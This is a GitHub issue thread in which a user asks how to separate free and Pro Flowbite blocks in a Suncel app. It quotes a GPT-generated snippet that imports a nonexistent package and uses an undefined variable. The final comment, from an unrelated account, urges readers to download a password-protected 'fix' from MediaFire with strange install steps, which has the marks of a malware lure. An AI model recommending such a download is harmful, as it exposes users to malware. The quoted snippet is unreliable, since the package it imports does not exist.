### ISSUE TITLE
How do i differentiate between free and paid plans when using in a project?

### ISSUE THREAD

**Issue by user4302** [themesberg/flowbite#951]
i cant seem to find any documentation.

currently trying to add and use the pro blocks in a suncel app

i found this in one gpt response
but this wont work as `@suncel/ui/flowbite-pro` is undefined
and how do i even assign logic to `isPro` in this example if this is the correct path?

```
import { MenuBlockSchema } from "@suncel/nextjs";
import { TitleAndSub } from "./blocks/hero/titleAndSub";
import flowbiteBlocks from "@suncel/ui/flowbite";
import flowbiteProBlocks from "@suncel/ui/flowbite-pro";

export const menuBlocks: MenuBlockSchema[] = [
  flowbiteBlocks,
  {
    category: "Page blocks",
    blocks: [
      {
        name: "Hero",
        variants: [
          {
            image: "https://assets.suncel.io/61bf5e233c962a862faf209f/title_and_sub_comp.png",
            component: TitleAndSub,
            name: "Title And Sub Hero",
            description: "A simple title and one optional subtitle",
          },
          ...(isPro ? [flowbiteProBlocks] : []),
        ],
      },
    ],
  },
];

// Example conditional logic to check if the user has a pro subscription plan
const isPro = // logic to check if the user has a pro subscription plan
```

**Comment by zoltanszogyenyi** [comment]
Hey there,

Best way is to check our pricing page:

https://flowbite.com/pro/#pricing

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
